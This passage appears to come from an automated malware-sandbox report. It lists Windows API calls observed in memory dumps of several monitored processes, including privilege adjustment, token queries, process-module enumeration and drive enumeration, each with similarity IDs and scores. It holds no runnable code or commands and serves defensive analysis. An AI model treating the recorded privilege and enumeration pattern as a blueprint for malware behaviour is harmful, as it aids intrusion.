                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02211148
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,6EDED775,00000000,00000000,00000000,00000000), ref: 01B8AFBE
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,6EDED775,00000000,00000000,00000000,00000000), ref: 022108E5
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01B8BA7E
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0221132F
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetErrorMode.KERNELBASE(?), ref: 01B8A39C
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02210640
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0221099C
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 01B8AA71
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01B8AB1A
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,6EDED775,00000000,00000000,00000000,00000000), ref: 02210819
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 01B8ABC9
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01B8BA7E
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 022101D0
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0221109E
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01B8A23E
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0221132F
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleScreenBufferInfo.KERNEL32 ref: 01B8BB2F
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: BufferConsoleInfoScreen
                                                    • String ID:
                                                    • API String ID: 3437242342-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02210502
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02210FB0
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01B8A94A
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02210640
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 01B8ABC9
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02211148
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0221099C
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetErrorMode.KERNELBASE(?), ref: 01B8A39C
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 01B8AA71
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 01B8A9C8
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 01B8A9C8
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2138395363.0000000002AB0000.00000040.00000040.sdmp, Offset: 02AB0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2138395363.0000000002AB0000.00000040.00000040.sdmp, Offset: 02AB0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2138539069.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133771275.0000000001B82000.00000040.00000001.sdmp, Offset: 01B82000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133771275.0000000001B82000.00000040.00000001.sdmp, Offset: 01B82000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Executed Functions

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 001D19B8
                                                    • KiUserExceptionDispatcher.NTDLL ref: 001D19CA
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.2181492390.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 001D19B8
                                                    • KiUserExceptionDispatcher.NTDLL ref: 001D19CA
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.2181492390.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.2181397137.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.2181397137.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Executed Functions

                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 003CAD37
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 003CAD37
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 003CB329
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 003CB329
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 027401D0
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0274072D
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02740DD6
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,98F50E52,00000000,00000000,00000000,00000000), ref: 003CAFBE
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,98F50E52,00000000,00000000,00000000,00000000), ref: 003CBDBC
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0274109E
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,98F50E52,00000000,00000000,00000000,00000000), ref: 003CB0AE
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 003CA23E
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,98F50E52,00000000,00000000,00000000,00000000), ref: 02740819
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02740502
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0274072D
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,98F50E52,00000000,00000000,00000000,00000000), ref: 027408E5
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • VerLanguageNameW.KERNELBASE(?,00000E9C,?,?), ref: 003CA94A
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageName
                                                    • String ID:
                                                    • API String ID: 2060303382-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02740DD6
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,98F50E52,00000000,00000000,00000000,00000000), ref: 003CBDBC
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,98F50E52,00000000,00000000,00000000,00000000), ref: 003CB0AE
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02740FB0
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleMode
                                                    • String ID:
                                                    • API String ID: 4145635619-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 003CAB1A
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02741148
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,98F50E52,00000000,00000000,00000000,00000000), ref: 003CAFBE
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 003CBA7E
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,98F50E52,00000000,00000000,00000000,00000000), ref: 027408E5
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetErrorMode.KERNELBASE(?), ref: 003CA39C
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0274132F
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02740640
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 003CAA71
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 003CAB1A
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0274099C
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,98F50E52,00000000,00000000,00000000,00000000), ref: 02740819
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
